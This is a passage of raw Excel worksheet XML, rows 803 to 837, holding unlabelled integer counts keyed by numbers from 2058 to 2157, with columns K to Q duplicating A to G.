        <v>1</v>
      </c>
      <c r="N803" s="8">
        <v>0</v>
      </c>
      <c r="O803" s="8">
        <v>0</v>
      </c>
      <c r="P803" s="8">
        <v>9</v>
      </c>
      <c r="Q803" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="804" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A804" s="7">
        <v>2058</v>
      </c>
      <c r="B804" s="8">
        <v>26</v>
      </c>
      <c r="C804" s="8">
        <v>1</v>
      </c>
      <c r="D804" s="8">
        <v>5</v>
      </c>
      <c r="E804" s="8">
        <v>10</v>
      </c>
      <c r="F804" s="8">
        <v>6</v>
      </c>
      <c r="G804" s="8">
        <v>12</v>
      </c>
      <c r="H804" s="8">
        <v>60</v>
      </c>
      <c r="K804" s="7">
        <v>2058</v>
      </c>
      <c r="L804" s="8">
        <v>26</v>
      </c>
      <c r="M804" s="8">
        <v>1</v>
      </c>
      <c r="N804" s="8">
        <v>5</v>
      </c>
      <c r="O804" s="8">
        <v>10</v>
      </c>
      <c r="P804" s="8">
        <v>6</v>
      </c>
      <c r="Q804" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="805" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A805" s="7">
        <v>2064</v>
      </c>
      <c r="B805" s="8">
        <v>26</v>
      </c>
      <c r="C805" s="8">
        <v>1</v>
      </c>
      <c r="D805" s="8">
        <v>5</v>
      </c>
      <c r="E805" s="8">
        <v>0</v>
      </c>
      <c r="F805" s="8">
        <v>4</v>
      </c>
      <c r="G805" s="8">
        <v>2</v>
      </c>
      <c r="H805" s="8">
        <v>38</v>
      </c>
      <c r="K805" s="7">
        <v>2064</v>
      </c>
      <c r="L805" s="8">
        <v>26</v>
      </c>
      <c r="M805" s="8">
        <v>1</v>
      </c>
      <c r="N805" s="8">
        <v>5</v>
      </c>
      <c r="O805" s="8">
        <v>0</v>
      </c>
      <c r="P805" s="8">
        <v>4</v>
      </c>
      <c r="Q805" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="806" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A806" s="7">
        <v>2066</v>
      </c>
      <c r="B806" s="8">
        <v>25</v>
      </c>
      <c r="C806" s="8">
        <v>1</v>
      </c>
      <c r="D806" s="8">
        <v>12</v>
      </c>
      <c r="E806" s="8">
        <v>0</v>
      </c>
      <c r="F806" s="8">
        <v>8</v>
      </c>
      <c r="G806" s="8">
        <v>0</v>
      </c>
      <c r="H806" s="8">
        <v>46</v>
      </c>
      <c r="K806" s="7">
        <v>2066</v>
      </c>
      <c r="L806" s="8">
        <v>25</v>
      </c>
      <c r="M806" s="8">
        <v>1</v>
      </c>
      <c r="N806" s="8">
        <v>12</v>
      </c>
      <c r="O806" s="8">
        <v>0</v>
      </c>
      <c r="P806" s="8">
        <v>8</v>
      </c>
      <c r="Q806" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="807" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A807" s="7">
        <v>2067</v>
      </c>
      <c r="B807" s="8">
        <v>7</v>
      </c>
      <c r="C807" s="8">
        <v>7</v>
      </c>
      <c r="D807" s="8">
        <v>0</v>
      </c>
      <c r="E807" s="8">
        <v>0</v>
      </c>
      <c r="F807" s="8">
        <v>24</v>
      </c>
      <c r="G807" s="8">
        <v>4</v>
      </c>
      <c r="H807" s="8">
        <v>42</v>
      </c>
      <c r="K807" s="7">
        <v>2067</v>
      </c>
      <c r="L807" s="8">
        <v>7</v>
      </c>
      <c r="M807" s="8">
        <v>7</v>
      </c>
      <c r="N807" s="8">
        <v>0</v>
      </c>
      <c r="O807" s="8">
        <v>0</v>
      </c>
      <c r="P807" s="8">
        <v>24</v>
      </c>
      <c r="Q807" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="808" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A808" s="7">
        <v>2068</v>
      </c>
      <c r="B808" s="8">
        <v>26</v>
      </c>
      <c r="C808" s="8">
        <v>0</v>
      </c>
      <c r="D808" s="8">
        <v>10</v>
      </c>
      <c r="E808" s="8">
        <v>5</v>
      </c>
      <c r="F808" s="8">
        <v>4</v>
      </c>
      <c r="G808" s="8">
        <v>2</v>
      </c>
      <c r="H808" s="8">
        <v>47</v>
      </c>
      <c r="K808" s="7">
        <v>2068</v>
      </c>
      <c r="L808" s="8">
        <v>26</v>
      </c>
      <c r="M808" s="8">
        <v>0</v>
      </c>
      <c r="N808" s="8">
        <v>10</v>
      </c>
      <c r="O808" s="8">
        <v>5</v>
      </c>
      <c r="P808" s="8">
        <v>4</v>
      </c>
      <c r="Q808" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="809" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A809" s="7">
        <v>2070</v>
      </c>
      <c r="B809" s="8">
        <v>26</v>
      </c>
      <c r="C809" s="8">
        <v>1</v>
      </c>
      <c r="D809" s="8">
        <v>0</v>
      </c>
      <c r="E809" s="8">
        <v>0</v>
      </c>
      <c r="F809" s="8">
        <v>7</v>
      </c>
      <c r="G809" s="8">
        <v>3</v>
      </c>
      <c r="H809" s="8">
        <v>37</v>
      </c>
      <c r="K809" s="7">
        <v>2070</v>
      </c>
      <c r="L809" s="8">
        <v>26</v>
      </c>
      <c r="M809" s="8">
        <v>1</v>
      </c>
      <c r="N809" s="8">
        <v>0</v>
      </c>
      <c r="O809" s="8">
        <v>0</v>
      </c>
      <c r="P809" s="8">
        <v>7</v>
      </c>
      <c r="Q809" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="810" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A810" s="7">
        <v>2075</v>
      </c>
      <c r="B810" s="8">
        <v>26</v>
      </c>
      <c r="C810" s="8">
        <v>1</v>
      </c>
      <c r="D810" s="8">
        <v>13</v>
      </c>
      <c r="E810" s="8">
        <v>2</v>
      </c>
      <c r="F810" s="8">
        <v>2</v>
      </c>
      <c r="G810" s="8">
        <v>4</v>
      </c>
      <c r="H810" s="8">
        <v>48</v>
      </c>
      <c r="K810" s="7">
        <v>2075</v>
      </c>
      <c r="L810" s="8">
        <v>26</v>
      </c>
      <c r="M810" s="8">
        <v>1</v>
      </c>
      <c r="N810" s="8">
        <v>13</v>
      </c>
      <c r="O810" s="8">
        <v>2</v>
      </c>
      <c r="P810" s="8">
        <v>2</v>
      </c>
      <c r="Q810" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="811" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A811" s="7">
        <v>2077</v>
      </c>
      <c r="B811" s="8">
        <v>26</v>
      </c>
      <c r="C811" s="8">
        <v>0</v>
      </c>
      <c r="D811" s="8">
        <v>5</v>
      </c>
      <c r="E811" s="8">
        <v>7</v>
      </c>
      <c r="F811" s="8">
        <v>3</v>
      </c>
      <c r="G811" s="8">
        <v>1</v>
      </c>
      <c r="H811" s="8">
        <v>42</v>
      </c>
      <c r="K811" s="7">
        <v>2077</v>
      </c>
      <c r="L811" s="8">
        <v>26</v>
      </c>
      <c r="M811" s="8">
        <v>0</v>
      </c>
      <c r="N811" s="8">
        <v>5</v>
      </c>
      <c r="O811" s="8">
        <v>7</v>
      </c>
      <c r="P811" s="8">
        <v>3</v>
      </c>
      <c r="Q811" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="812" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A812" s="7">
        <v>2082</v>
      </c>
      <c r="B812" s="8">
        <v>6</v>
      </c>
      <c r="C812" s="8">
        <v>1</v>
      </c>
      <c r="D812" s="8">
        <v>3</v>
      </c>
      <c r="E812" s="8">
        <v>0</v>
      </c>
      <c r="F812" s="8">
        <v>2</v>
      </c>
      <c r="G812" s="8">
        <v>5</v>
      </c>
      <c r="H812" s="8">
        <v>17</v>
      </c>
      <c r="K812" s="7">
        <v>2082</v>
      </c>
      <c r="L812" s="8">
        <v>6</v>
      </c>
      <c r="M812" s="8">
        <v>1</v>
      </c>
      <c r="N812" s="8">
        <v>3</v>
      </c>
      <c r="O812" s="8">
        <v>0</v>
      </c>
      <c r="P812" s="8">
        <v>2</v>
      </c>
      <c r="Q812" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="813" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A813" s="7">
        <v>2083</v>
      </c>
      <c r="B813" s="8">
        <v>25</v>
      </c>
      <c r="C813" s="8">
        <v>1</v>
      </c>
      <c r="D813" s="8">
        <v>0</v>
      </c>
      <c r="E813" s="8">
        <v>0</v>
      </c>
      <c r="F813" s="8">
        <v>7</v>
      </c>
      <c r="G813" s="8">
        <v>7</v>
      </c>
      <c r="H813" s="8">
        <v>40</v>
      </c>
      <c r="K813" s="7">
        <v>2083</v>
      </c>
      <c r="L813" s="8">
        <v>25</v>
      </c>
      <c r="M813" s="8">
        <v>1</v>
      </c>
      <c r="N813" s="8">
        <v>0</v>
      </c>
      <c r="O813" s="8">
        <v>0</v>
      </c>
      <c r="P813" s="8">
        <v>7</v>
      </c>
      <c r="Q813" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="814" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A814" s="7">
        <v>2086</v>
      </c>
      <c r="B814" s="8">
        <v>24</v>
      </c>
      <c r="C814" s="8">
        <v>0</v>
      </c>
      <c r="D814" s="8">
        <v>0</v>
      </c>
      <c r="E814" s="8">
        <v>0</v>
      </c>
      <c r="F814" s="8">
        <v>47</v>
      </c>
      <c r="G814" s="8">
        <v>2</v>
      </c>
      <c r="H814" s="8">
        <v>73</v>
      </c>
      <c r="K814" s="7">
        <v>2086</v>
      </c>
      <c r="L814" s="8">
        <v>24</v>
      </c>
      <c r="M814" s="8">
        <v>0</v>
      </c>
      <c r="N814" s="8">
        <v>0</v>
      </c>
      <c r="O814" s="8">
        <v>0</v>
      </c>
      <c r="P814" s="8">
        <v>47</v>
      </c>
      <c r="Q814" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="815" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A815" s="7">
        <v>2088</v>
      </c>
      <c r="B815" s="8">
        <v>26</v>
      </c>
      <c r="C815" s="8">
        <v>0</v>
      </c>
      <c r="D815" s="8">
        <v>5</v>
      </c>
      <c r="E815" s="8">
        <v>0</v>
      </c>
      <c r="F815" s="8">
        <v>1</v>
      </c>
      <c r="G815" s="8">
        <v>0</v>
      </c>
      <c r="H815" s="8">
        <v>32</v>
      </c>
      <c r="K815" s="7">
        <v>2088</v>
      </c>
      <c r="L815" s="8">
        <v>26</v>
      </c>
      <c r="M815" s="8">
        <v>0</v>
      </c>
      <c r="N815" s="8">
        <v>5</v>
      </c>
      <c r="O815" s="8">
        <v>0</v>
      </c>
      <c r="P815" s="8">
        <v>1</v>
      </c>
      <c r="Q815" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="816" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A816" s="7">
        <v>2091</v>
      </c>
      <c r="B816" s="8">
        <v>26</v>
      </c>
      <c r="C816" s="8">
        <v>2</v>
      </c>
      <c r="D816" s="8">
        <v>4</v>
      </c>
      <c r="E816" s="8">
        <v>5</v>
      </c>
      <c r="F816" s="8">
        <v>7</v>
      </c>
      <c r="G816" s="8">
        <v>11</v>
      </c>
      <c r="H816" s="8">
        <v>55</v>
      </c>
      <c r="K816" s="7">
        <v>2091</v>
      </c>
      <c r="L816" s="8">
        <v>26</v>
      </c>
      <c r="M816" s="8">
        <v>2</v>
      </c>
      <c r="N816" s="8">
        <v>4</v>
      </c>
      <c r="O816" s="8">
        <v>5</v>
      </c>
      <c r="P816" s="8">
        <v>7</v>
      </c>
      <c r="Q816" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="817" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A817" s="7">
        <v>2092</v>
      </c>
      <c r="B817" s="8">
        <v>25</v>
      </c>
      <c r="C817" s="8">
        <v>1</v>
      </c>
      <c r="D817" s="8">
        <v>45</v>
      </c>
      <c r="E817" s="8">
        <v>86</v>
      </c>
      <c r="F817" s="8">
        <v>58</v>
      </c>
      <c r="G817" s="8">
        <v>122</v>
      </c>
      <c r="H817" s="8">
        <v>337</v>
      </c>
      <c r="K817" s="7">
        <v>2092</v>
      </c>
      <c r="L817" s="8">
        <v>25</v>
      </c>
      <c r="M817" s="8">
        <v>1</v>
      </c>
      <c r="N817" s="8">
        <v>45</v>
      </c>
      <c r="O817" s="8">
        <v>86</v>
      </c>
      <c r="P817" s="8">
        <v>58</v>
      </c>
      <c r="Q817" s="8">
        <v>122</v>
      </c>
    </row>
    <row r="818" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A818" s="7">
        <v>2097</v>
      </c>
      <c r="B818" s="8">
        <v>26</v>
      </c>
      <c r="C818" s="8">
        <v>0</v>
      </c>
      <c r="D818" s="8">
        <v>2</v>
      </c>
      <c r="E818" s="8">
        <v>0</v>
      </c>
      <c r="F818" s="8">
        <v>3</v>
      </c>
      <c r="G818" s="8">
        <v>7</v>
      </c>
      <c r="H818" s="8">
        <v>38</v>
      </c>
      <c r="K818" s="7">
        <v>2097</v>
      </c>
      <c r="L818" s="8">
        <v>26</v>
      </c>
      <c r="M818" s="8">
        <v>0</v>
      </c>
      <c r="N818" s="8">
        <v>2</v>
      </c>
      <c r="O818" s="8">
        <v>0</v>
      </c>
      <c r="P818" s="8">
        <v>3</v>
      </c>
      <c r="Q818" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="819" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A819" s="7">
        <v>2098</v>
      </c>
      <c r="B819" s="8">
        <v>28</v>
      </c>
      <c r="C819" s="8">
        <v>1</v>
      </c>
      <c r="D819" s="8">
        <v>0</v>
      </c>
      <c r="E819" s="8">
        <v>0</v>
      </c>
      <c r="F819" s="8">
        <v>4</v>
      </c>
      <c r="G819" s="8">
        <v>4</v>
      </c>
      <c r="H819" s="8">
        <v>37</v>
      </c>
      <c r="K819" s="7">
        <v>2098</v>
      </c>
      <c r="L819" s="8">
        <v>28</v>
      </c>
      <c r="M819" s="8">
        <v>1</v>
      </c>
      <c r="N819" s="8">
        <v>0</v>
      </c>
      <c r="O819" s="8">
        <v>0</v>
      </c>
      <c r="P819" s="8">
        <v>4</v>
      </c>
      <c r="Q819" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="820" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A820" s="7">
        <v>2102</v>
      </c>
      <c r="B820" s="8">
        <v>26</v>
      </c>
      <c r="C820" s="8">
        <v>8</v>
      </c>
      <c r="D820" s="8">
        <v>3</v>
      </c>
      <c r="E820" s="8">
        <v>2</v>
      </c>
      <c r="F820" s="8">
        <v>6</v>
      </c>
      <c r="G820" s="8">
        <v>1</v>
      </c>
      <c r="H820" s="8">
        <v>46</v>
      </c>
      <c r="K820" s="7">
        <v>2102</v>
      </c>
      <c r="L820" s="8">
        <v>26</v>
      </c>
      <c r="M820" s="8">
        <v>8</v>
      </c>
      <c r="N820" s="8">
        <v>3</v>
      </c>
      <c r="O820" s="8">
        <v>2</v>
      </c>
      <c r="P820" s="8">
        <v>6</v>
      </c>
      <c r="Q820" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="821" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A821" s="7">
        <v>2106</v>
      </c>
      <c r="B821" s="8">
        <v>24</v>
      </c>
      <c r="C821" s="8">
        <v>0</v>
      </c>
      <c r="D821" s="8">
        <v>16</v>
      </c>
      <c r="E821" s="8">
        <v>15</v>
      </c>
      <c r="F821" s="8">
        <v>2</v>
      </c>
      <c r="G821" s="8">
        <v>1</v>
      </c>
      <c r="H821" s="8">
        <v>58</v>
      </c>
      <c r="K821" s="7">
        <v>2106</v>
      </c>
      <c r="L821" s="8">
        <v>24</v>
      </c>
      <c r="M821" s="8">
        <v>0</v>
      </c>
      <c r="N821" s="8">
        <v>16</v>
      </c>
      <c r="O821" s="8">
        <v>15</v>
      </c>
      <c r="P821" s="8">
        <v>2</v>
      </c>
      <c r="Q821" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="822" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A822" s="7">
        <v>2107</v>
      </c>
      <c r="B822" s="8">
        <v>26</v>
      </c>
      <c r="C822" s="8">
        <v>3</v>
      </c>
      <c r="D822" s="8">
        <v>16</v>
      </c>
      <c r="E822" s="8">
        <v>23</v>
      </c>
      <c r="F822" s="8">
        <v>39</v>
      </c>
      <c r="G822" s="8">
        <v>7</v>
      </c>
      <c r="H822" s="8">
        <v>114</v>
      </c>
      <c r="K822" s="7">
        <v>2107</v>
      </c>
      <c r="L822" s="8">
        <v>26</v>
      </c>
      <c r="M822" s="8">
        <v>3</v>
      </c>
      <c r="N822" s="8">
        <v>16</v>
      </c>
      <c r="O822" s="8">
        <v>23</v>
      </c>
      <c r="P822" s="8">
        <v>39</v>
      </c>
      <c r="Q822" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="823" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A823" s="7">
        <v>2109</v>
      </c>
      <c r="B823" s="8">
        <v>24</v>
      </c>
      <c r="C823" s="8">
        <v>1</v>
      </c>
      <c r="D823" s="8">
        <v>0</v>
      </c>
      <c r="E823" s="8">
        <v>0</v>
      </c>
      <c r="F823" s="8">
        <v>4</v>
      </c>
      <c r="G823" s="8">
        <v>0</v>
      </c>
      <c r="H823" s="8">
        <v>29</v>
      </c>
      <c r="K823" s="7">
        <v>2109</v>
      </c>
      <c r="L823" s="8">
        <v>24</v>
      </c>
      <c r="M823" s="8">
        <v>1</v>
      </c>
      <c r="N823" s="8">
        <v>0</v>
      </c>
      <c r="O823" s="8">
        <v>0</v>
      </c>
      <c r="P823" s="8">
        <v>4</v>
      </c>
      <c r="Q823" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="824" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A824" s="7">
        <v>2110</v>
      </c>
      <c r="B824" s="8">
        <v>31</v>
      </c>
      <c r="C824" s="8">
        <v>0</v>
      </c>
      <c r="D824" s="8">
        <v>0</v>
      </c>
      <c r="E824" s="8">
        <v>0</v>
      </c>
      <c r="F824" s="8">
        <v>3</v>
      </c>
      <c r="G824" s="8">
        <v>0</v>
      </c>
      <c r="H824" s="8">
        <v>34</v>
      </c>
      <c r="K824" s="7">
        <v>2110</v>
      </c>
      <c r="L824" s="8">
        <v>31</v>
      </c>
      <c r="M824" s="8">
        <v>0</v>
      </c>
      <c r="N824" s="8">
        <v>0</v>
      </c>
      <c r="O824" s="8">
        <v>0</v>
      </c>
      <c r="P824" s="8">
        <v>3</v>
      </c>
      <c r="Q824" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="825" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A825" s="7">
        <v>2112</v>
      </c>
      <c r="B825" s="8">
        <v>25</v>
      </c>
      <c r="C825" s="8">
        <v>0</v>
      </c>
      <c r="D825" s="8">
        <v>0</v>
      </c>
      <c r="E825" s="8">
        <v>0</v>
      </c>
      <c r="F825" s="8">
        <v>10</v>
      </c>
      <c r="G825" s="8">
        <v>4</v>
      </c>
      <c r="H825" s="8">
        <v>39</v>
      </c>
      <c r="K825" s="7">
        <v>2112</v>
      </c>
      <c r="L825" s="8">
        <v>25</v>
      </c>
      <c r="M825" s="8">
        <v>0</v>
      </c>
      <c r="N825" s="8">
        <v>0</v>
      </c>
      <c r="O825" s="8">
        <v>0</v>
      </c>
      <c r="P825" s="8">
        <v>10</v>
      </c>
      <c r="Q825" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="826" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A826" s="7">
        <v>2118</v>
      </c>
      <c r="B826" s="8">
        <v>30</v>
      </c>
      <c r="C826" s="8">
        <v>2</v>
      </c>
      <c r="D826" s="8">
        <v>8</v>
      </c>
      <c r="E826" s="8">
        <v>8</v>
      </c>
      <c r="F826" s="8">
        <v>8</v>
      </c>
      <c r="G826" s="8">
        <v>4</v>
      </c>
      <c r="H826" s="8">
        <v>60</v>
      </c>
      <c r="K826" s="7">
        <v>2118</v>
      </c>
      <c r="L826" s="8">
        <v>30</v>
      </c>
      <c r="M826" s="8">
        <v>2</v>
      </c>
      <c r="N826" s="8">
        <v>8</v>
      </c>
      <c r="O826" s="8">
        <v>8</v>
      </c>
      <c r="P826" s="8">
        <v>8</v>
      </c>
      <c r="Q826" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="827" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A827" s="7">
        <v>2120</v>
      </c>
      <c r="B827" s="8">
        <v>20</v>
      </c>
      <c r="C827" s="8">
        <v>0</v>
      </c>
      <c r="D827" s="8">
        <v>3</v>
      </c>
      <c r="E827" s="8">
        <v>2</v>
      </c>
      <c r="F827" s="8">
        <v>4</v>
      </c>
      <c r="G827" s="8">
        <v>5</v>
      </c>
      <c r="H827" s="8">
        <v>34</v>
      </c>
      <c r="K827" s="7">
        <v>2120</v>
      </c>
      <c r="L827" s="8">
        <v>20</v>
      </c>
      <c r="M827" s="8">
        <v>0</v>
      </c>
      <c r="N827" s="8">
        <v>3</v>
      </c>
      <c r="O827" s="8">
        <v>2</v>
      </c>
      <c r="P827" s="8">
        <v>4</v>
      </c>
      <c r="Q827" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="828" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A828" s="7">
        <v>2124</v>
      </c>
      <c r="B828" s="8">
        <v>7</v>
      </c>
      <c r="C828" s="8">
        <v>0</v>
      </c>
      <c r="D828" s="8">
        <v>0</v>
      </c>
      <c r="E828" s="8">
        <v>0</v>
      </c>
      <c r="F828" s="8">
        <v>42</v>
      </c>
      <c r="G828" s="8">
        <v>4</v>
      </c>
      <c r="H828" s="8">
        <v>53</v>
      </c>
      <c r="K828" s="7">
        <v>2124</v>
      </c>
      <c r="L828" s="8">
        <v>7</v>
      </c>
      <c r="M828" s="8">
        <v>0</v>
      </c>
      <c r="N828" s="8">
        <v>0</v>
      </c>
      <c r="O828" s="8">
        <v>0</v>
      </c>
      <c r="P828" s="8">
        <v>42</v>
      </c>
      <c r="Q828" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="829" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A829" s="7">
        <v>2126</v>
      </c>
      <c r="B829" s="8">
        <v>26</v>
      </c>
      <c r="C829" s="8">
        <v>1</v>
      </c>
      <c r="D829" s="8">
        <v>0</v>
      </c>
      <c r="E829" s="8">
        <v>0</v>
      </c>
      <c r="F829" s="8">
        <v>6</v>
      </c>
      <c r="G829" s="8">
        <v>1</v>
      </c>
      <c r="H829" s="8">
        <v>34</v>
      </c>
      <c r="K829" s="7">
        <v>2126</v>
      </c>
      <c r="L829" s="8">
        <v>26</v>
      </c>
      <c r="M829" s="8">
        <v>1</v>
      </c>
      <c r="N829" s="8">
        <v>0</v>
      </c>
      <c r="O829" s="8">
        <v>0</v>
      </c>
      <c r="P829" s="8">
        <v>6</v>
      </c>
      <c r="Q829" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="830" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A830" s="7">
        <v>2127</v>
      </c>
      <c r="B830" s="8">
        <v>30</v>
      </c>
      <c r="C830" s="8">
        <v>3</v>
      </c>
      <c r="D830" s="8">
        <v>65</v>
      </c>
      <c r="E830" s="8">
        <v>0</v>
      </c>
      <c r="F830" s="8">
        <v>51</v>
      </c>
      <c r="G830" s="8">
        <v>15</v>
      </c>
      <c r="H830" s="8">
        <v>164</v>
      </c>
      <c r="K830" s="7">
        <v>2127</v>
      </c>
      <c r="L830" s="8">
        <v>30</v>
      </c>
      <c r="M830" s="8">
        <v>3</v>
      </c>
      <c r="N830" s="8">
        <v>65</v>
      </c>
      <c r="O830" s="8">
        <v>0</v>
      </c>
      <c r="P830" s="8">
        <v>51</v>
      </c>
      <c r="Q830" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="831" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A831" s="7">
        <v>2129</v>
      </c>
      <c r="B831" s="8">
        <v>25</v>
      </c>
      <c r="C831" s="8">
        <v>3</v>
      </c>
      <c r="D831" s="8">
        <v>362</v>
      </c>
      <c r="E831" s="8">
        <v>650</v>
      </c>
      <c r="F831" s="8">
        <v>62</v>
      </c>
      <c r="G831" s="8">
        <v>23</v>
      </c>
      <c r="H831" s="8">
        <v>1125</v>
      </c>
      <c r="K831" s="7">
        <v>2129</v>
      </c>
      <c r="L831" s="8">
        <v>25</v>
      </c>
      <c r="M831" s="8">
        <v>3</v>
      </c>
      <c r="N831" s="8">
        <v>362</v>
      </c>
      <c r="O831" s="8">
        <v>650</v>
      </c>
      <c r="P831" s="8">
        <v>62</v>
      </c>
      <c r="Q831" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="832" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A832" s="7">
        <v>2134</v>
      </c>
      <c r="B832" s="8">
        <v>20</v>
      </c>
      <c r="C832" s="8">
        <v>2</v>
      </c>
      <c r="D832" s="8">
        <v>0</v>
      </c>
      <c r="E832" s="8">
        <v>0</v>
      </c>
      <c r="F832" s="8">
        <v>9</v>
      </c>
      <c r="G832" s="8">
        <v>3</v>
      </c>
      <c r="H832" s="8">
        <v>34</v>
      </c>
      <c r="K832" s="7">
        <v>2134</v>
      </c>
      <c r="L832" s="8">
        <v>20</v>
      </c>
      <c r="M832" s="8">
        <v>2</v>
      </c>
      <c r="N832" s="8">
        <v>0</v>
      </c>
      <c r="O832" s="8">
        <v>0</v>
      </c>
      <c r="P832" s="8">
        <v>9</v>
      </c>
      <c r="Q832" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="833" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A833" s="7">
        <v>2138</v>
      </c>
      <c r="B833" s="8">
        <v>7</v>
      </c>
      <c r="C833" s="8">
        <v>0</v>
      </c>
      <c r="D833" s="8">
        <v>2</v>
      </c>
      <c r="E833" s="8">
        <v>0</v>
      </c>
      <c r="F833" s="8">
        <v>2</v>
      </c>
      <c r="G833" s="8">
        <v>2</v>
      </c>
      <c r="H833" s="8">
        <v>13</v>
      </c>
      <c r="K833" s="7">
        <v>2138</v>
      </c>
      <c r="L833" s="8">
        <v>7</v>
      </c>
      <c r="M833" s="8">
        <v>0</v>
      </c>
      <c r="N833" s="8">
        <v>2</v>
      </c>
      <c r="O833" s="8">
        <v>0</v>
      </c>
      <c r="P833" s="8">
        <v>2</v>
      </c>
      <c r="Q833" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="834" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A834" s="7">
        <v>2142</v>
      </c>
      <c r="B834" s="8">
        <v>25</v>
      </c>
      <c r="C834" s="8">
        <v>1</v>
      </c>
      <c r="D834" s="8">
        <v>0</v>
      </c>
      <c r="E834" s="8">
        <v>0</v>
      </c>
      <c r="F834" s="8">
        <v>2</v>
      </c>
      <c r="G834" s="8">
        <v>1</v>
      </c>
      <c r="H834" s="8">
        <v>29</v>
      </c>
      <c r="K834" s="7">
        <v>2142</v>
      </c>
      <c r="L834" s="8">
        <v>25</v>
      </c>
      <c r="M834" s="8">
        <v>1</v>
      </c>
      <c r="N834" s="8">
        <v>0</v>
      </c>
      <c r="O834" s="8">
        <v>0</v>
      </c>
      <c r="P834" s="8">
        <v>2</v>
      </c>
      <c r="Q834" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="835" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A835" s="7">
        <v>2143</v>
      </c>
      <c r="B835" s="8">
        <v>26</v>
      </c>
      <c r="C835" s="8">
        <v>1</v>
      </c>
      <c r="D835" s="8">
        <v>21</v>
      </c>
      <c r="E835" s="8">
        <v>30</v>
      </c>
      <c r="F835" s="8">
        <v>7</v>
      </c>
      <c r="G835" s="8">
        <v>3</v>
      </c>
      <c r="H835" s="8">
        <v>88</v>
      </c>
      <c r="K835" s="7">
        <v>2143</v>
      </c>
      <c r="L835" s="8">
        <v>26</v>
      </c>
      <c r="M835" s="8">
        <v>1</v>
      </c>
      <c r="N835" s="8">
        <v>21</v>
      </c>
      <c r="O835" s="8">
        <v>30</v>
      </c>
      <c r="P835" s="8">
        <v>7</v>
      </c>
      <c r="Q835" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="836" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A836" s="7">
        <v>2155</v>
      </c>
      <c r="B836" s="8">
        <v>0</v>
      </c>
      <c r="C836" s="8">
        <v>0</v>
      </c>
      <c r="D836" s="8">
        <v>6</v>
      </c>
      <c r="E836" s="8">
        <v>37</v>
      </c>
      <c r="F836" s="8">
        <v>7</v>
      </c>
      <c r="G836" s="8">
        <v>2</v>
      </c>
      <c r="H836" s="8">
        <v>52</v>
      </c>
      <c r="K836" s="7">
        <v>2155</v>
      </c>
      <c r="L836" s="8">
        <v>0</v>
      </c>
      <c r="M836" s="8">
        <v>0</v>
      </c>
      <c r="N836" s="8">
        <v>6</v>
      </c>
      <c r="O836" s="8">
        <v>37</v>
      </c>
      <c r="P836" s="8">
        <v>7</v>
      </c>
      <c r="Q836" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="837" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A837" s="7">
        <v>2157</v>
      </c>
      <c r="B837" s="8">
        <v>6</v>
      </c>
      <c r="C837" s="8">
        <v>1</v>
      </c>
      <c r="D837" s="8">
        <v>0</v>
      </c>
      <c r="E837" s="8">
        <v>0</v>
      </c>
      <c r="F837" s="8">
        <v>3</v>
      </c>
      <c r="G837" s="8">
        <v>1</v>
      </c>
      <c r="H837" s="8">
        <v>11</v>
      </c>
